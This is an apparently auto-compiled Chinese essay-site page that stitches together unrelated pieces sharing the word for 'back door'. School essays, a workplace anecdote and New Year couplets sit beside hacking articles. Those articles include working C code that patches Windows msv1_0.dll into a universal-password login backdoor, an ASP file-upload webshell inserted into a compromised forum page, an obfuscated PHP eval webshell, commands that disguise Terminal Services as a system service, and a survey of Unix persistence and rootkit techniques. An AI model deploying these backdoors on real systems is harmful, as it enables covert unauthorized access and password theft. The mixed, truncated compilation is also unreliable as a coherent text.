后门的900字作文

精品范文时间：2024-02-14 07:12:36 收藏本文下载本文

第1篇：后门750字作文

后门750字作文（共24篇）由网友“派大绵”投稿提供，以下是小编精心整理的后门750字作文，供大家阅读参考。

篇1：通用密码后门

By:clyfish

From:幻影邮件列表

其实这些东西我很早就做出来用了，而且效果还不错，目前没有一个管理员发现，

以下程序只在winxpsp2中文版上测试

#include

#include “windows.h”

#include “wincrypt.h”

wchar_t passwd[1024];

char path[1024], hash[16];

const int os1 = 0x8DB0, os2 = 0x1C3A7, spasswd = 0x1C397;

const char chunk1[] = {

0xE8, 0xF2, 0x35, 0x01, 0x00, 0x90

};

const char chunk2[] = {

0x55, 0x8B, 0xEC, 0x6A, 0x10, 0xFF, 0x75, 0x0C,

0x68, 0x97, 0xCF, 0xC5, 0x77, 0xFF, 0x15, 0xCC,

0x10, 0xC4, 0x77, 0xC9, 0x83, 0xF8, 0x10, 0x75,

0x03, 0xC2, 0x00, 0x00, 0xFF, 0x25, 0xCC, 0x10,

0xC4, 0x77

};

void err(char *msg) {

printf(“error: %s\\n”, msg);

exit(1);

}

int main(int argc, char *argv[]) {

HCRYPTPROV hProv;

HCRYPTHASH hHash;

unsigned len, sint = sizeof(int);

FILE *fout;

if (argc != 2) {

printf(“msv1_0.dll password backdoor generator by cly\\n”

“Usage:\\n%s password\\nOnly for winxp sp2\\n”, argv[0]);

exit(1);

}

len = strlen(argv[1]);

if (len > 512)

err(“the password is too long”);

len = MultiByteToWideChar(CP_ACP, 0, argv[1], len, passwd, 1024);

if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, 0))

if (!CryptAcquireContext(&hProv, NULL, MS_DEF_PROV,

PROV_RSA_FULL,

CRYPT_NEWKEYSET))

err(“CryptAcquireContext”);

if (!CryptCreateHash(hProv, CALG_MD4, 0, 0, &hHash))

err(“CryptCreateHash”);

if (!CryptHashData(hHash, passwd, len * sizeof(wchar_t), 0))

err(“CryptHashData”);

CryptGetHashParam(hHash, HP_HASHSIZE, &len, &sint, 0);

if (len != 16)

err(“CryptGetHashParam”);

CryptGetHashParam(hHash, HP_HASHVAL, hash, &len, 0);

if (hHash)

CryptDestroyHash(hHash);

if (hProv)

CryptReleaseContext(hProv, 0);

if (strlen(getenv(“windir”)) > 512)

err(“Are you kidding?”);

sprintf(path, “%s\\\\system32\\\\msv1_0.dll”, getenv(“windir”));

if (!CopyFileA(path, “msv1_0.dll.cly”, 0))

err(“CopyFileA”);

fout = fopen(“msv1_0.dll.cly”, “rb+”);

if (fout == NULL)

err(“fopen”);

fseek(fout, os1, SEEK_SET);

fwrite(chunk1, sizeof(chunk1), 1, fout);

fseek(fout, os2, SEEK_SET);

fwrite(chunk2, sizeof(chunk2), 1, fout);

fseek(fout, ospasswd, SEEK_SET);

fwrite(hash, sizeof(hash), 1, fout);

fclose(fout);

return 0;

}

运行这个程序把得到的msv1_0.dll.cly复制到c:\\windows\\system32\\msv1_0.dll（自己想办法绕过WFP），所

有的用户就可以用你设置的密码来登陆了，远程桌面也是可以的，

这里只是提供一种思路，其他的版本比如win2k3应该而是可以这样搞的。

其实我最开始是看到网上一片文章，不过他是空口令可以登陆，而我这是自己设置的口令可以登陆。

Linux下就更简单了，直接编译一个自己的pam_unix.so上去就可以了。

这个pam_unix.so可以记录正确的密码，也可以做和上面一样的通用密码后门。

我是这样搞的，先判断密码对错，如果对了则记录并放行，否则判断是否为我设置的通用密码，如果是就放行，其他的验证失败。

这样我local root成功后，放这样一个后门，管理员还真是难查出来。

写出来只为博高手一笑。

篇2：谈谈后门

作者：yyt_hac

主页：www.yythac.com

Email：webmaster@yythac.com“>webmaster@yythac.com

随着电脑技术的发展和网络的普及，技术已经为越来越多的人所了解，好多网站也推出了

培训班、VIP会员等一系列服务，这些服务必然会培养出好多技术爱好者，而后门作为必须的工具

必然会受到越来越多的关注，目前新后门增长的速度也很快，我接触后门很久了，也写过一些后门，现在想

谈谈对后门的一些看法，如果有错误的地方，欢迎指正。

我想谈的第一个问题就是对一些概念的理解，那就是“远程控制软件”，“木马”，“后门”。

一般“远程控制软件”是指用户便于远程管理而有意在自己机器上安装的软件，如pcanywhere，它

的特征是用户自己有意安装的软件，它的使用者是用户自己。不过现在有人也把“远程控制软件”的意义扩

充了，认为有远程控制功能的软件就叫远程控制软件，比如有些木马、后门有远程控制功能，也把它们叫远

程控制软件。

“木马”全名叫“特洛伊木马”，它的使用者是，更确切的说是“骇客”，它主要是“骇客”

通过欺骗用户的方法（包含捆绑，利用网页等）让用户不知不觉的安装到他们系统中的一类软件，主要功能

有远程控制，盗密码等。木马的名字就指出了它的特征，那就是具有欺骗性，软件的分类不应该看它的功能

，而是应该看它的特征。现在有些木马的开发者不喜欢把自己开发的木马叫作“木马”，而是叫“远程控制

软件”。原因很简单，“木马”是贬义的，“远程控制软件”就是褒义的了，这样做也可以理解，因为毕竟

“木马”也包含在扩充了意义的“远程控制软件”中了。可是还有人说它开发的木马是远程控制软件而不是

木马，这就不能理解了。是不是木马不是由你说的，而是要看它的特征。“木马”和常规远程控制软件的区

别就在于它能够通过欺骗的方式让用户不知不觉的安装到他的计算机中，它不是用户自己想安装的，而常规

远程控制软件是用户自己有意安装的。你能说“冰河”不是木马吗？不能，因为它有木马的特征。木马的特

征也是好多人讨厌它的原因，因为被人欺骗了总是很痛苦的，特别是被人欺骗了感情；好多木马都有盗密码

功能，这是让人讨厌它的另一个原因，因此水平比较高的都不屑于用木马。

“后门”是在入侵了计算机以后为了以后能方便的进入该计算机而安装的一类软件，它的使用

者是水平比较高的，他们入侵的机器都是一些性能比较好的服务器，而且这些计算机的管理员水平都比

较高，为了不让管理员发现，这就要求“后门”必须很隐蔽，因此后门的特征就是它的隐蔽性。木马的隐蔽

性也很重要，可是由于被安装了木马的机器的使用者一般水平都不高，因此相对来说就没有后门这么重要了。

后门和木马的区别就是它更注重隐蔽性但是没有欺骗性，因此它的危害性没有木马大，名声介于“远程控制

软件”和“木马”之间。

通过上面的分析，我们就很容易区分这三类软件了。后门作为一种工具，它的主要用途还是在

非法方面，把它说成是一种恶意程序也可以接受，可是却不能把它说成是病毒、木马，因为它们出来本质特

征是不同的。当然，任何事物都有两面性，有好的作用就有坏的作用，工具本身的好坏是一个方面，但是关

键是要看使用工具的人，刀可以用来杀人也可以用来救人，不能因为刀可以杀人就把刀说得一无是处，关键

是看好处多些还是坏处多些，

后门也一样，不可否认，它的坏处要多些，可是它的破坏力不大，而且它也有

好的一方面，比如后门让大家增加网络安全意识，提高国家整体网络安全水平，可以增加杀毒软件的卖点，

也可以用它来控制国外的机器为祖国做贡献，是不是很夸张？

下面我们谈谈什么样的后门才是好后门？也就是后门最重要的是什么？

现在好多后门技术都公开了，也都有源代码，因此写一个后门并不困难，只要学会了编程，两个星

期就可以写出一个还可以的后门，这也是新后门不断增加的原因，可是要写一个真正好后门并不是一件容易

的事情。那什么样的后门才是真正好的后门呢？其实从上面可以知道后门的特征就是它的隐蔽性，因此隐蔽

性好的后门才是真正的好后门。我发现好多人在说这个后门的功能有多么多么的强大，那个后门有多么多么

难卸载，讨论这些有意义吗？只有在隐蔽性很好的情况下再来考虑它的功能和易用性，否则被发现了，你的

后门功能再多，再容易使用，也一点作用都没有。如果你只想找功能强大，容易使用的后门，我劝你还是使

用商业化的远程控制软件好了，如把pcanywhere改成能在命令行下可以安装的版本就可以了，它的功能够强

大了吧，使用也够方便了吧，根本用不到后门。难卸载性就更没意义了，如果我发现了我的机器被装了后门

，你再难卸载我重装系统还不行吗？不可能你发现有根刺在你肉里而不把它拔出来的。如果你发现你的系统

被装了后门却因为难卸载而能忍受它在你的系统中，那我只能说 ‘I 服了 YOU’。

那么后门的隐蔽性主要体现在哪些方面呢？我觉得有下面三个方面：

启动方式、存在方式和连接方式。

启动方式是指当操作系统启动时怎样启动后门，目前决大多数后门都是采用加注册表启动项或者加

系统服务的方式，这些方式都是很容易发现的，而感染系统文件的启动方式是比较隐蔽的。

存在方式是指当后门成功启动后，它在操作系统中的存在形式，目前主要有三种方式：进程、隐藏

进程和远程线程，进程和隐藏进程现在都很容易发现了，远程线程是一种比较隐蔽的方式。

连接方式是指该后门的用户怎样通过客户端和安装了该后门的机器建立连接，从而控制该机器。开

tcp端口的方式太明显，fport就可以发现，udp端口也一样，使用icmp等数据包实现无连接传输不是很稳定，

目前端口复用技术和反向连接技术都是比较好的技术，各有所长，也可以两种技术相结合。

如果一个后门能够把上面三个方面都做得很好，那才是一个真正的好后门，否则只能算是一个入门

级后门。

那为什么要写后门呢？

首先，写一个好的后门是一件很有挑战性的事情，毕竟它涉及到很多高级的编程技术，编写后门能

够增加你对操作系统底层的了解，大幅度的提高编程水平。从事一些工作的人水平到了一定的阶段就想有所

突破，做一些有挑战性的事情，比如登山运动员想登上珠穆朗玛峰，游戏运动员想游过太平洋，程序员

嘛就是想写一个好后门了。

其次，写后门可以提高你在界的知名度。

再次，写收费后门还可以带来经济效益。

最后，后门虽然有很多坏处，但是毕竟破坏力不大，它也有些好的用途。

写这篇文章是因为在聊天的过程中经常有人和我讨论这些问题，也看到了好多人对这些问题的看法，

因此我也把我的一些观点写出来，以后有人和我讨论这些问题我就把这篇文章给他看就可以了。

这篇文章有可能会冒犯一些人，如果你觉得我冒犯了你，那有可能是你水平比较低，因为我尊重的

是水平高的，而不是骇客。如果你自认为水平很高却还是觉得我冒犯了你，那欢迎批评指正。

篇3：后门新思路

作者：随矜而去 www.xxql.com/

今天给大家说一下在动网BBS下一个做后门的新思路

大家入侵完一个动网BBS后，怎么做一个后门，这个是我攻击一个黄色网站时候想到的，但不知道是不是有人已经比我先想到，我就在这里说了！

好了，开始吧，我们在他论坛下找到show.asp，然后编辑！

在最下面插入

<%dim noon%>

<%noon=request(”noon“)%>

<%if noon=”xxql.com“ then%>

<%dim objFSO%>

<%dim fdata%>

<%dim objCountFile%>

<%on error resume next%>

<%Set bjFSO = Server.CreateObject(”Scripting.FileSystemObject“)%>

<%if Trim(request(”syfdpath“))”“ then%>

<%fdata = request(”cyfddata“)%>

<%Set bjCountFile=objFSO.CreateTextFile(request(”syfdpath“),True)%>

<%objCountFile.Write fdata%>

<%if err =0 then%>

<%response.write ”save Success!“%>

<%else%>

<%response.write ”Save UnSuccess!“%>

<%end if%>

<%err.clear%>

<%end if%>

<%objCountFile.Close%>

<%Set bjCountFile=Nothing%>

<%Set bjFSO = Nothing%>

<%=server.mappath(Request.ServerVariables(”SCRIPT_NAME“))%>

<%end if%>

我只是把人家的代码拆分了一下用用，嘿嘿，别建议哈

然后大家看一下：www.XXX.com/bbs/show.asp?noon=xxql.com

拉到最下面，看到绝对路径了没有？

在人家论坛的后门已经算做好了，什么意思呢，很简单，这是一个服务端的代码，然后您在其他空间或者本地支持ASP的地方做一个客户端，看代码：

<%Response.write ”“%>

<%Response.Write ”“%>

<%Response.write ”“%>

<%Response.write ”输入马的内容:“%>

<%Response.write ”“%>

这里我说明一下，在服务端的最后一段代码是显示绝对路径的

然后在客户端的 action=”“ 里就填上你服务端所在的文件路径

下面一个value=”“ 改成你存放在马所在服务器上的绝对路径

这样你随便把客户端放在哪里都可以对服务端上传其他的木马

就这样，很简单！假如大家觉得麻烦也可以用海洋里自带的后门工具

篇4：入侵后门

从早期的计算机入侵者开始，他们就努力发展能使自己重返被入侵系统的技术或后门，

入侵后门

。大多数入侵者的后门实现以下的目的：即使管理员改变密码，仍然能再次侵入，并且使再次侵入被发现的可能性减至最低，

大多数后门是设法躲过日志，即使入侵者正在使用系统也无法

篇5：教学之后门

通常我们在得到一个主机的控制权后，总是考虑下次如何轻易的能再次进来，而不需要每次都重复复杂的漏洞利用，也有可能系统管理员发现了漏洞及时的补上了呢，

教学之后门

。那么我们需要安装backdoor（后门），这样只要管理员没有发现被入侵或没有发现我们的后门，下次就可以非常轻松的进来了。在这我们介绍一些常用的后门。

Rhosts + + 后门

在unix系统里，一些Rsh、Rlogin通过基于rhosts文件的简单认证。在某个帐户的home下的rhosts文件里加上一行++，那么任何人任何机器都可以不需要密码登陆这个帐户了。

校验和与时间戳后门

严格的讲，这只是一个隐藏后门的方法。我们通常用自己写的木马来代替系统原来的一些可执行文件来达到后门的效果。许多管理员通过时间戳和校验和来检查是否存在这样的木马。我们可以通过一些小技巧来很容易的欺骗，一个简单的程序通过修改系统时钟就能使文件的时间戳和原始一样，至于校验和是用CRC，更加容易伪造了。所以系统管理员还是定期用MD5 校验和来检查文件吧。起码不可能伪造MD5的校验和。

这个是最常用的后门了，我们可以用login.c的源代码改一改，编译一下，替代原来的login，功能就是先检查我设定的密码，如果对的话，不去比较系统密码，直接进入，而对于其他用户来说和原来的login用起来感觉是一样的。而且在程序上可以不必记录utmp和wtmp，那么你用后门密码进去的时候就是隐形的了。为了防止strings命令显示出login的文本内容，从而暴露backdoor的后门密码。那么在改login.c的时候就得加密或隐藏口令了。但管理员还是可以用MD5校验和来发现这类后门。

Telnetd 后门

当inetd守护程序发现有telnet连接，就交给in.telnetd处理，进入login程序。在in.telnetd处理时通常检测一些其他信息，例如终端类型是Xterm还是vt100等，我们可以修改in.telnetd在这加一个类型hole,当我们选择hole时，系统将自动给个shell，而不需要认证。

Services 后门

每个服务都可以被利用来当作后门，象什么finger,rsh,rexec,rlogin,ftp,inetd...。这和那些开放某个

端口提供shell的后门程序没什么差别，只是隐蔽一点罢了。当然你可以修改inetd.conf加一些伪装成某

个服务的程序，名字可以是uutcp...等具有伪装性的。

Crontab 后门

Crontab使unix系统在特定的时间内执行指定的程序。我们可以让系统在每天的特定时间运行我们的指定

开放port的shell程序。当然系统管理员也会检查/usr/spool/cron/crontabs/下的文件来看有没有安排后门的存在。所以通过修改那些正常的cron程序，可以达到隐蔽的目的。

Library 后门

几乎所有的unix系统使用共享库文件，共享一些常用的调用。

通常我们在crypt.c和_crypt.c中安置后门程序。login.c使用crypt,如果在里头安置后门的话，在调用

Crypt()时，可以跳过校验，直接给出shell.这样就是管理员用MD5检验login程序也不会发现我们的后门了，

如果管理员MD5检查所有的文件，难免会发现这些问题。但我们还有一个方法，我们知道无论是什么程序，它都需要调用open()和其他的文件存取函数，如果我们能在这些上面做文章，那么当MD5执行时读取的是原来的文件，但执行的却是我们的后门程序，所以MD5看到的校验和是没有问题的。

kernel 后门

可装载内核后门是最难发现而且难度最高的了。具体的描述可以参看w00w00著名的Linux Kernel Module (LKM) Hacking。

www.w00w00.org/files/articles/lkmhack.txt

File system 后门

我们通常为了隐藏一些自己的后门程序、exploit程序、工具等文件，一般是采用.目录的隐藏方式。但很容易被发现，所以修改一些象ls、du、fsck等程序达到隐藏的目的要更好一些。

如果更狠一点，就可以把文件放在磁盘的块标志成坏的，并且采用特殊的文件系统格式，只有特定的程序才能读出，这样也可以达到很好的隐藏效果。 Bootblock 后门

在PC中病毒有一种类型叫引导型病毒，通过修改引导区程序来达到隐藏和执行的目的。当然有许多杀毒程序也能查杀这些病毒。但在unix中，很少有管理员会使用软件来检查引导区，所以把后门放到引导区也是一个很有用的方法。

进程隐藏后门

为了不让管理员用ps发现我们后门程序运行的进程

一般有几种方法：

1、通过修改argv[]来使程序看起来象另一个进程。

2、改名成和系统进程类似的名字。

3、修改ps，使ps看不见。

4、利用amodload之类的程序，内核加入可装载模块来实现后门。

Rootkit

由许多工具构成的后门工具集。有一些这样的模块构成：

修改系统日志 utmp wtmp lastlog。

sniffer,passcracker。

欺骗时间戳和crc校验。

修改login

修改 ifconfig 的 PROMISC标志的输出。使检测不到分乱模式。

修改ps使发现不了进程。

隐藏使用的磁盘空间。

隐藏所有的rootkit文件。

TCP Shell 后门

最常见的后门了，一个程序listen端口，连接后给出shell.

容易被发现，netstat一看就知道了。

UDP Shell 后门

基于udp传输的后门，原理tcp shell后门差不多。

ICMP Shell 后门

通过ICMP协议建立pipe来实现通讯的后门。

ACK Shell后门

通过TCP中ACK数据片来进行通讯的后门。这个比较有意思，能避过许多防火墙，天网也不例外。

篇6：入侵者的后门

从早期的计算机入侵者开始，他们就努力发展能使自己重返被入侵系统的技术或后门，大多数入侵者的后门实现以下的目的：即使管理员改变密码，仍然能再次侵入，并且使再次侵入被发现的可能性减至最低，

大多数后门是设法躲过日志，即使入侵者正在使用系统也无法

篇7：修改后门经验谈

作者:dkollf 来自:bbs.pysky.net

不知道大家装自己的后门的时候是怎么修改服务的，我记得曾经有人说过，起服务名是一件需要艺术+技术的事，一个很垃圾的后门会因为你起的服务名而长久存活，而一个很好的后门会因为你的垃圾服务名而立马挂掉，

废话不说了，就以我自己安装终端服务为例来讲讲改服务的好处吧。

这里我们要用到几个工具，先介绍一下：

3389.exe 这个不说了吧，地球人都知道

tport.exe 这个也应该知道，但是说一下，这个是改3389端口的

serv.exe 服务管理程序，可以安装、删除、修改服务

dtreg.exe CMD下的一个注册表工具，和regedit差不多。

开始，假设我们已经控制了机器，是2kserver的，终端服务还没开，让我们来开吧

3389.exe 1 #安装终端，不重起

tport.exe 9918 #修改端口

net stop ClipSrv #-----------------|删除次要服务

serv.exe remove ClipSrv /y #-----------|为修改服务做准备

copy termsrv.exe clipsvr.exe #将终端的文件拷贝成和要取代的服务比较接近的名字

serv.exe install ClipSrv /b:”%windir%\\system32\\clipsvr.exe“ /n:”ClipBook“ /i:yes /u:LocalSystem /s:auto #安装成刚才删除的服务

dtreg.exe -Quiet -Set REG_SZ \\HKLM\\SYSTEM\\CurrentControlSet\\Services\\ClipBook\\Description=支持”剪贴簿查看器“，以便可以从远程剪贴簿查阅剪贴页面，

#修改注册表

serv modify termservice /s:disabled #修改原先终端服务的状态

现在重起一次，你会发现终端服务已经开启，端口为9918,打开服务管理器你会发现终端服务已经禁用了,进程里也没有termsrv.exe这个进程,相对来说这个已经很安全了，我一直也是用这中方式开终端，不知道其他人是不是这样干的,大家可以交流一下，呵呵.

篇8：如何开启永远的后门

IIS是比较流行的www服务器，设置不当漏洞就很多，

如何开启永远的后门

，

入侵iis服务器后留下后门，以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听，比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点

篇9：后门的900字作文

关于后门的900字作文

后门，开或不开都具有相同的意义，因为我在后门处，心在后门外。

——题记

后门是我一直向往的地方，因为我可以掌控它，因为我可以听见她走路的声音，因为我可以听见她讲课的声音，因为她在后门外而已。

刚刚坐到我向往已久的位子，充满无尽的遐想，幻想在她自习课时随手打开后门，可是并未想象那么美好，还要顾及别人的感受。

每一次，我轻轻打开后门，总能看见她在三四班穿梭，而每一次都能听见他温柔的声音，每一次……每一次都是这样。

一次，刚上完我所厌烦的地理课，使得我上下眼皮亲密无间，于是趴在了桌子上休息一下，等我一睁眼，巨大的surprise——多美正在向后门走来，小巧的身体从又窄又长的通道走过来，看着异常可爱，她来听课，这是我万万没有想到的，然后急忙环顾四周，看看有没有我所记录的关于她的东西，45分钟，她坐在我旁边，心里异常的'兴奋又紧张，那张熟悉的面孔，娟秀的字体在上面一个一个被记下，不知道她在偷笑什么，反正看起来很可爱，看着秒针一圈一圈的转着，心里有些着急，多么不想结束这堂课啊！可是这般模样使我又深感没有容身之处，手啊脚啊都像是多余的不知道放哪，然而，放哪都感觉不自然，当她低头记下一些东西时，趁机回头瞄一眼，她便不会发现我在做什么，如若出一个笑话，我又听见她久违的笑声，她是莲多美无人能及，她坐在那小小的角落，挨着后门和我，可是终究要下课的，当她站起身，目送她走出教室，像曲终人散般的结局，难免给人带来些伤感，而多美走了，只剩下后门和我，总感觉她还在那小小的“多美部落”。一直在。可一回头，她没在。只有一扇后门，门外依旧是那样的景色。

后门，一扇再普通不过了的门，打开它，外面的世界像水中的月亮迷人却又十分梦幻，就像轻轻触碰一下水面，这亦真亦幻的世界又不复存在了。

后门，开或不开，都具有相同的意义，不是她在门外，而是在我心里。

——后记

篇10：后门山之春作文

一只彩色的蝴蝶把我引进了后门山，

后门山之春作文

。

“山不在高，有景则美；春不在早，有花则秀。”后山可美了！

后山的春景，最美的是他的花。最普通的，最多的就是黄灿灿的迎春花。迎春花，迎接春的到来，小学生作文大全你看，竹笋偷偷地跑了出来，调皮地伸着懒腰，张开大嘴贪婪吮吸大地母亲的乳汁，抛开所有的烦恼，无牵无挂地奔向大自然，尽情享受春光的沐浴，在春天的感召下，健康成长每一天。

我忍受不住自然的诱惑，去除我心爱的小提琴，无拘无束地弹奏起春光曲。这琴声，是赞美春天的歌，是赞美大自然的心声。

那迎春花、那竹笋、那琴声怎能不让我爱上春天，爱上

后门软件优秀作文

一连串的打击使我抬不起头来。高考落榜，满腔抱负顿时化为泡影;求爹爹告奶奶四处找工作，吃的都是闭门羹。重读?不开后门，那昂贵的补习费缴得起吗?父母一声一声的叹息，使我本来就压抑的心情更加沉重。后门，这该死的后门!要不是它，我也不会被大学拒之于门外，求职也不会这么艰难。从一名众人羡慕的优秀团干部到受人冷服的待业青年，我无法适应这种反差。活着还有什么意思呢?我一冲动，拉开门，撒腿奔向孝子河。当刺骨的河水没及我的嘴唇，我猛地一激灵:难道连续三年的“三好学生”，就这样无声无息地消失?从什么地方摔倒，就要从什么地方爬起来!既然后门已根深蒂固，我为什么不利用自己的计算机特长，开发一种成功指路的“后门软件”呢?就像久困沙摸的旅人见到遥远的绿洲，绝望的我看到了一线希望。顾不得是在河水中，我激动得跳了起来。不好，呛水了。

我用父母准备给我上学的钱，买了一台旧式PC电脑和几十箱方便面，把自己反锁在小屋里。能否改变自己的命运，关键在这一搏。首先我在键盘上敲人座右铭“生于忧患，死于安乐”。它随时出现在屏幕上方，以支撑我干完这件成败未卜的工作。

万事开头难。我尝试了十几种语言，没有一点头绪。我停了下来，呆呆地盯住屏幕，有点丧气了，脊背也像散了架似的。显示屏一声不响，只知道重复打出“生于忧患，死于安乐”八个字。它那方方的脑袋此时看来特别呆板难看。对了，问题就出在这里。现有的计算机语言，逻辑性太强，一就是一二就是二，而走后门需要头脑灵活，精于变通，编制一种沟通计算机世界与现实世界的语言迫在眉睫。几天以后，总算有了些眉目。一想到自己在从事一项前所未有的.研究，我的热情无异于加氧的火焰，越燃越高。

不知不觉，九九八十一天飞逝而过，语言编制也趋于完美。当最后一个字符打完，我才发觉双手似乎失去了知觉，眼皮也打起架来。叫什么名字呢?就以我的大名命名为“TJ语言”吧。我用冰水刺激了一下面部，又坐到链盘前。迟钝的手指在大脑驭使下，运用诞生才两分钟的语言，开始了软件开发。才输入几个语句，情况就变得非同寻常。十个手指从来没有这样活跃，似乎有一股神奇的力盘在操纵着它们，啪啪啪跳个不停。我不禁想起华佗的五禽戏。一会儿我心旷神怡，脸色也逐渐红润起来。

扬声器传来展撼人心的《命运交响曲》，屏幕上随之打出一行字:“走后门，看我的!后门软件，名不虚传!”我的脸涨得通红，刚要使用，却一下子昏了过去。人脑毕竟不是电脑，需要休息呀。

篇12：前门后门的700字作文

关于前门后门的700字作文

“……你是不是像我在太阳下低头，流着汗水默默辛苦地工作，你是不是像我就算受了冷漠，也不放弃自己想要的生活……”

阿亮骑在车上，心不在焉地哼着张雨生的《我的未来不是梦》。破旧的自行车的车轮犹如圆规一样，一遍又一遍地转动，驶向回家的路。

阿亮有一种感觉，只觉得车胎快爆炸了。阿亮不重，纯种瘦猴型的，沉重的是阿亮背包里那几份试卷。

语文58分，英语62分，数学47分……

阿亮不记得自己是怎么从教室走出来的`，对，是从后门，狼狈不堪……

阿亮苦笑了一下，风吹起他头上的几根凌乱的头发，不，更准确点儿说是杂草，显得不堪一击。

阿亮有点儿怀念小学，那时嘻嘻哈哈打打闹闹，成绩仍考得好，大家可以在阳光的沐浴下，意气风发地从前门大步迈进教室……

而现在教室分成两道门：前门，后门。

从前门进来的，是老师的宠儿，是阿亮可望不可即的“星级大腕”；从后门进来的，则大多是比较那个的学生，阿亮从那道门槛跨了近三年。

阿亮突然好想从前门进去，但他不敢。当他踌躇地抱着球站在门口，他的脚刚迈了半步，停在半空时，他突然看见班长的目光，毫不经意的目光，他突然看见那道目光中，尽写着，‘嘲讽”二字。阿亮摸摸手中的球，逃跑似的溜了，从后门一穿而过。

阿亮的足球被班长锁住了，明晃晃的钥匙在他的脖子上荡来荡去。

阿亮妈又开始埋怨：“关灯吧，都坏四个灯泡了。”

“嗯哪，关，马上关!”阿亮捧着一本书‘极不情愿地点点头。

这天晚上，阿亮又睡不着了。明天，我该从后门走还是从前门走?

这次：语文82，数学87，英语91。

他又一次念着这几个数字。

这也是他有史以来第一次失眠。

第二天，阿亮像踢球射门一样冲进教室前门……

回过头来，才发现前门和后门其实只有几步之遥。

…………

篇13：php后门异或

看这个：

echo ”A“^”}“;

运行这段代码，那么输出的结果是字符”<“,之所以会得到这样的结果，是因为代码中对字符”A“和字符”}“进行了异或操作，在PHP中，两个变量进行异或时，会将字符串转换成二进制再进行异或，异或完，又将结果从二进制转换成了字符串。异或操作有时也被用来交换两个变量的值。

我们都知道，PHP是弱类型的语言，也就是说在PHP中我们可以不预先声明变量的类型，而直接声明一个变量并进行初始化或赋值操作。正是由于PHP弱类型的这个特点，我们对PHP的变类型进行隐式的转换，并利用这个特点进行一些非常规的操作。如将整型转换成字符串型，将布尔型当作整型，或者将字符串当作函数来处理，下面我们来看一段代码：

$_++;

$__=”<“^”}“;

$__(”stuff“);

看到这段代码，大家或许会觉得很疑惑，下面我简单的来解释一下：

(1)$_++;这行代码的意思是对变量名为”_“的变量进行自增操作，在PHP中未定义的变量默认值为null,null==false==0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。

(2)$__=”<“^”}“;对字符”<“和”}“进行异或运算，得到结果A赋给变量名为”__“(两个下划线)的变量

(3)$__(”stuff“);通过上面的赋值操作,变量$__的值为A，所以这行可以看作是A(”stuff“),在PHP中,这行代码表示调用函数A,但是由于程序中并未定义函数A，所以这行代码会抛出一个致命错误使程序停止运行，

这行代码没什么实际的意义，但是它能简单体现出在PHP中，我们可以将字符串当作函数来处理。

文章进行到这里，大家如果再看到类似的PHP后门应该不会那么迷惑了，你可以通过一句句的分析后门代码来理解后门想实现的功能。如果你依然迷惑，那说明本菜鸟的文章写的不好，先说声抱歉了，但是还是希望你别骂我。

上面的那段示例代码最后会出错，导致程序停止运行，当然写出一个出错的程序并不是我们的目的，使用这种后门的主要目的是创建一些可以绕过检测的并且对我们有用的字符串，如_POST”, “system”, “call_user_func_array”，或者是任何我们需要的东西。

下面是个非常简单的非数字字母的PHP后门：

@$_++; // $_ = 1

$__=(“#”^“|”); // $__ = _

$__.=(“.”^“~”); // _P

$__.=(“/”^“`”); // _PO

$__.=(“|”^“/”); // _POS

$__.=(“{”^“/”); // _POST

@eval(${$__}[!$_]);//mima:0

上菜刀把。

篇14：职场感悟,后门不是捷径

我在公司的人力资源部上班，负责公司大大小小的招聘会，可以说拥有一定的人事“生死大权”，一些亲友知道了，便拜托我走走后门，将他们的孩子招进公司。为了不妨碍招聘的公正，我一般能拒绝就拒绝，不想搞“特殊化”。

可是，前不久，老爸以前工厂的厂长杨叔叔开口了，“黄主任，让闺女帮帮我儿子小缈吧，他什么都好，就是面试时爱脸红，甚至连话都说得不利索，第一印象就会扣分，与很多工作机会便擦肩而过了。”想到自己初求职时也曾经胆怯迷茫，我心软了，决定给小缈一次机会。

面试的日子到了，我单独当面检验小缈的能力，以便做出聘用或不聘用的决定。我看得出来，小缈有一些紧张，但是也有不易觉察的庆幸，仿佛得到这份工作已易如反掌了。这样的局面，作为面试考官是我讨厌的，不过我还是念及老爸和杨叔叔的感情，没有直接结束不愉快的面试，而是一如既往地考察求职者的能力。

让我想不到的是，小缈不仅临场紧张，表达能力不尽如人意，而且求职材料很“苍白”。小缈的求职材料显示，英语专业的他大四才拿到四级证书，几乎没有参加任何社会实践活动，没有比如家教类的兼职体验，也没有打暑期工的经历，

除了完成得并不出色的学业，小缈几乎没有任何“亮点”。更不可思议的是，小缈从大学毕业到现在有接近一年的职业空白期，没有做任何工作，赋闲在家。我终于明白，为什么那么多公司都没聘用小缈，原来他的就业竞争力实在太小，小到不足以获得一份工作的机会。

我为公司招聘的是广告部的工作人员，对求职者的要求不低，以小缈的资质显然达不到要求。本着对公司和小缈负责的态度，我给出了不予聘用的决定。我知道，这样的决定会让老爸、小缈和杨叔叔失望，但是，心底的一个声音告诉我，选择得对，我别无选择。

事后，我告诉小缈和杨叔叔，“其实，在职场上，后门并不是最好的捷径。如果贸然选择捷径，受损失的不仅是求职者、招聘者，还有用人单位。职场从来都没有捷径，如果一定要找一条通往成功的捷径，那便是在求职前充实自己，不虚度学习的时光，才能为日后的工作奠定良好的基础，求职时不落下风赢得先机。”

小缈和杨叔叔仿佛明白了什么，而我最后说，“如果小缈获得了聘用职位的能力，我一定会重新给他面试的机会，职场从来都是平等的，机会对任何人都是一样的。”

篇15：新年后门的对联

横批：新春大吉

上联：一元复始春回地

下联：万象更新福临门

横批：佳年顺景

上联：平安和顺家业旺

下联：健康快乐幸福多

横批：一帆风顺

上联：千秋伟业添锦绣

下联：万里鹏程展鸿图

横批：前程似锦

上联：三江进宝兴骏业

下联：四海来财展鸿图

横批：顺风得利

上联：创伟业天帮地助

下联：大财源川流云集

横批：恭喜发财

上联：三江进宝百业旺

下联：四海来财万福春

横批：一本万利

上联：好生意天帮地助

下联：大财源川流云集

横批：万事亨通

上联：占天时财源滚滚

下联：得地利好运连连

横批：一帆风顺

上联：求财顺景方方利

下联：出入平安事事成

横批：大展宏图

上联：风水宝地生百福

下联：富贵金门聚万财

横批：新春大吉

上联：龙腾四海百业旺

下联：春满九州万象新

横批：门迎百福

上联：瑞气呈祥舒万物

下联：财源有路进千家

横批：辞旧迎新

上联：乾坤有矩宾朋满

下联：龙门摆阵新春来

横批：祥临福到

上联：宴四方宾客，同酬致富方略；

